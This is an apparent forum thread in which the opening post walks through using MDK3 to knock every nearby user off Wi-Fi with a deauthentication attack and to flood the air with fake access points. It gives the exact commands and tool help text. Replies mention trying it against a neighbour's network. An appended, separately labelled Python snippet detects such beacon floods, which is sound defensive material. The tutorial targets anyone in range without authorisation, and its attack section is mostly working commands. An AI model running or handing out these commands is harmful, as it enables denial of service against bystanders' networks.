Interfaces of mass destruction.
#1
Hey there, first time meeting you. Now I will share my knowledge here, let's do it...
Using MDK3 is quite simple, since it comes with lots of help screens directly included in the code.
You can easily access them by typing only mdk3
MDK3 displays the main help screen. To see all possible options, type mdk3 --fullhelp
To see only information for a specific test, type mdk3 --help followed by the test mode identifier (b, a, p, d, m or x)

Before you can use MDK3, you need to set up your wireless adaptor. Since there are different driver architectures, the way to set up your adaptor may vary depending on which driver is in use. To make this procedure easy, it is recommended to use airmon-ng from the aircrack project, since this can set up almost every known driver correctly.
To enable injection, your card needs to be started and switched to monitor mode, and a bitrate and channel have to be set.

Now let's put our wireless interface in monitor mode and run a quick ifconfig to find out our MAC address.

Code:
# airmon-ng start wlan0
# ifconfig

Check the mdk3

Code:
# cd /pentest/wireless/mdk3

Now we want to deauthenticate everyone in our WLAN range. In order to do that, we need to make a list of MAC numbers that we DO NOT WANT TO GET AFFECTED, which is called a whitelist. So in my whitelist I'm just going to add my MAC address, because I don't care about all the others. So copy your MAC address and type this in the MDK3 directory.


Code:
# echo YOUR_MAC > whitelist
# echo 00:24:2b:7c:3e:9d > whitelist

[Image: 2.png]

Now let's look at our d option the Deauthentication / Disassociation Amok Mode:

Code:
d   - Deauthentication / Disassociation Amok Mode
      Kicks everybody found from AP
      OPTIONS:
      -w
         Read file containing MACs not to care about (Whitelist mode)
      -b
         Read file containing MACs to run test on (Blacklist Mode)
      -s
         Set speed in packets per second (Default: unlimited)
      -c [chan,chan,chan,...]
         Enable channel hopping. Without providing any channels, mdk3 will hop an all
         14 b/g channels. Channel will be changed every 5 seconds.

So what we are going to use is the w option, whitelist mode. Leave the s option alone, it's set to unlimited. Now the c option, channel, is up to you, but I'm going with all APs on channel 6 because most APs are on that channel by default.

Code:
./mdk3 mon0 d -w whitelist -c 6

[Image: whitelist.png]

So now we have successfully launched the attack; soon everyone will be disconnected. Now let's start flooding the air with fake access points. Open a new shell, browse to the MDK3 directory and run this.

Code:
./mdk3 mon0 b -g -c 6

Code:
b   - Beacon Flood Mode
      Sends beacon frames to show fake APs at clients.
      This can sometimes crash network scanners and even drivers!
      OPTIONS:
      -n
         Use SSID instead of randomly generated ones
      -f
         Read SSIDs from file
      -v
         Read MACs and SSIDs from file. See example file!
      -d
         Show station as Ad-Hoc
      -w
         Set WEP bit (Generates encrypted networks)
      -g
         Show station as 54 Mbit
      -t
         Show station using WPA TKIP encryption
      -a
         Show station using WPA AES encryption
      -m
         Use valid accesspoint MAC from OUI database
      -h
         Hop to channel where AP is spoofed
         This makes the test more effective against some devices/drivers
         But it reduces packet rate due to channel hopping.
      -c
         Fake an AP on channel . If you want your card to hop on
         this channel, you have to set -h option, too!
      -s
         Set speed in packets per second (Default: 50)
a   - Authentication DoS mode

Now let me explain: the b option is beacon flood mode. The -g option is Show station as 54 Mbit. The -c option is the channel. You can put an h if you want it to hop, but if you specify a channel it will produce fake APs faster.

[Image: 3.png]

Now when the user refreshes his network list he should see a never-ending scan in BackTrack.

[Image: APoints.png]

Try now... nice to join Indonesian BackTrack.

Many thanks to my teacher Liyan Oz, who taught me all about Linux.

UK Hacker TEAM

#2
Nice post, brother... and wellc0me to IBT.
By the way, when the formatting is whitelist, can you change it? I still don't understand... I tried your tutorial at my place, it does not work...

FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#3
(07-08-2011, 11:58 AM)zee eichel Wrote: Nice post, brother... and wellc0me to IBT.
By the way, when the formatting is whitelist, can you change it? I still don't understand... I tried your tutorial at my place, it does not work...

Maybe there is no wireless available at your place, sir,
so you must try in another place ^_^



@enc0de welcome to IBTeam, I will try your tutorials, sir.
Nice tutorial.

#4
(07-08-2011, 12:03 PM)devilnay Wrote:
(07-08-2011, 11:58 AM)zee eichel Wrote: Nice post, brother... and wellc0me to IBT.
By the way, when the formatting is whitelist, can you change it? I still don't understand... I tried your tutorial at my place, it does not work...

Maybe there is no wireless available at your place, sir,
so you must try in another place ^__^

There is a D-Link wireless access point at my neighbour's.. and I tested choosing the settings with the access point MAC address register list.. it allows just the MAC addresses listed in the whitelist.. when I try.. it does not work..


#5
I tried at my place,
but in wicd the networks do not show the same as in the picture.


Code:
Current MAC: 3C:77:0B:9C:A4:0C on Channel 11 with SSID: 8j/_,"Cy4]O(
Current MAC: 69:4B:F8:4A:00:5D on Channel 11 with SSID: <my/=..%*h)?W
Current MAC: D7:5F:16:BA:4E:1C on Channel 11 with SSID: gP
Current MAC: FA:6F:F9:74:9E:7D on Channel 11 with SSID: uDN?C+X/sna<D0s
Current MAC: E1:52:0E:C6:CC:8F on Channel 11 with SSID: oh(kpwh/GL"2J1/p1
Current MAC: BB:DA:95:4E:41:07 on Channel 11 with SSID: g{Ty;g(D%v4F;xNu
Current MAC: BF:B2:0E:72:8C:5C on Channel 11 with SSID: GOgIh2ZdC/v"]Ux 7T{lxq_]&l%W|53
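
Added example, not part of any post in this thread: a beacon flood like the one above shows up on a monitoring sensor as many unfamiliar BSSIDs on one channel, often with the group (multicast) bit set, which a real access point's BSSID never has. The Python code below flags both signals; the log shape copies the output quoted in post #5, and the sample lines and the `max_bssids` threshold are constructed assumptions.

```python
import re
from collections import defaultdict

# Same "MAC / channel / SSID" shape as the output quoted in post #5;
# a real sensor's log format will differ (assumption).
LINE_RE = re.compile(
    r"Current MAC: ((?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}) "
    r"on Channel (\d+) with SSID: (.*)"
)

# Constructed sample observations, not captured traffic.
SAMPLE = """\
Current MAC: 02:11:22:33:44:55 on Channel 1 with SSID: office-wifi
Current MAC: D7:5F:16:00:00:01 on Channel 6 with SSID: q9!xT
Current MAC: E1:52:0E:00:00:02 on Channel 6 with SSID: Lm2#pp0
Current MAC: 3C:77:0B:00:00:03 on Channel 6 with SSID: zz(4kW
Current MAC: BB:DA:95:00:00:04 on Channel 6 with SSID: r7Gh
Current MAC: 6A:4B:F8:00:00:05 on Channel 6 with SSID: Yw8_d
"""

def parse(text):
    """Return (bssid, channel, ssid) tuples for every matching line."""
    out = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            out.append((m.group(1).upper(), int(m.group(2)), m.group(3)))
    return out

def group_bit_set(mac):
    """True if the I/G bit (LSB of the first octet) is set: invalid for a BSSID."""
    return bool(int(mac[:2], 16) & 0x01)

def assess(observations, max_bssids=4):
    """Per-channel summary; max_bssids per window is a tunable assumption."""
    seen = defaultdict(set)
    for bssid, channel, _ssid in observations:
        seen[channel].add(bssid)
    report = {}
    for channel, bssids in seen.items():
        bad = sorted(b for b in bssids if group_bit_set(b))
        report[channel] = {
            "unique_bssids": len(bssids),
            "group_bit_bssids": bad,
            "suspect": bool(bad) or len(bssids) > max_bssids,
        }
    return report

if __name__ == "__main__":
    for ch, info in sorted(assess(parse(SAMPLE)).items()):
        print(ch, info)
```

Five of the seven MACs in the output quoted in post #5 have the group bit set. The group-bit check alone misses floods that use well-formed addresses (the -m option in the help text above), so the per-channel count is kept as a second signal.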

#6
Can you explain why, sir?





